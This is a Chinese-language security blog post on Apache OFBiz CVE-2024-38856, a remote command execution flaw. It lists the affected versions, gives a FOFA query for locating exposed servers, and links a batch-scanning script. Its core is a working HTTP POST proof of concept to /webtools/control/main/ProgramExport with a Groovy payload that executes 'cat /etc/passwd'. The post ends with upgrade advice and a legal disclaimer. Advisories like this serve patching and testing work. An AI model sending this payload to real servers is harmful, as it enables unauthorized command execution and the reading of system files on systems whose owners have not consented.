Apache OFBiz CVE-2024-38856 远程命令执行漏洞-Happy峰

漏洞描述

Apache OFBiz是一个非常著名的电子商务平台，是一个非常著名的开源项目，提供了创建基于最新J2EE/XML规范和技术标准，构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。Apache OFBiz在处理view视图渲染的时候存在逻辑缺陷，攻击者可通过构造特殊URL来覆盖最终的渲染视图，从而执行任意代码。

影响版本

Apache OFBiz <= 18.12.14

fofa语法

app=”Apache_OFBiz”

漏洞POC

POST /webtools/control/main/ProgramExport HTTP/1.1
Host: x.x.x.x
User-Agent:Mozilla/5.0(Windows NT 6.1)AppleWebKit/537.36(KHTML, like Gecko)Chrome/41.0.2228.0Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length:68


groovyProgram=thrownewException('cat /etc/passwd'.execute().text);

批量检测脚本

https://github.com/ATonysan/poc-exp/blob/main/ApacheOFBi_CVE-2024-38856_RCE.py

修复方法

官方已更新补丁，请升级至最新版本。

官网地址：https://ofbiz.apache.org/

文章版权声明 1、本网站名称：Happy峰安全运营
2、本站永久网址：https://blog.chenjiangfeng.com
3、本站发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途及盈利等目的，否则后果自行承担！
4、本网站的文章部分内容可能来源于网络，仅供大家学习与参考，如有侵权，请联系站长进行删除处理。
5、本站一切资源不代表本站立场，并不代表本站赞同其观点和对其真实性负责。
6、本站一律禁止以任何方式发布或转载任何违法的相关信息，访客发现请向站长举报
7、根据《计算机软件保护条例》第十七条，本站所有软件请仅用于学习研究用途

本站所有内容（包括但不限于文字、图片、视频等）均受到版权法保护，归作者所有，未经授权不得转载、复制或用于其他任何商业目的。转载请注明出处，并保留原文链接。对于未经授权的使用，我们将保留追究法律责任的权利。

THE END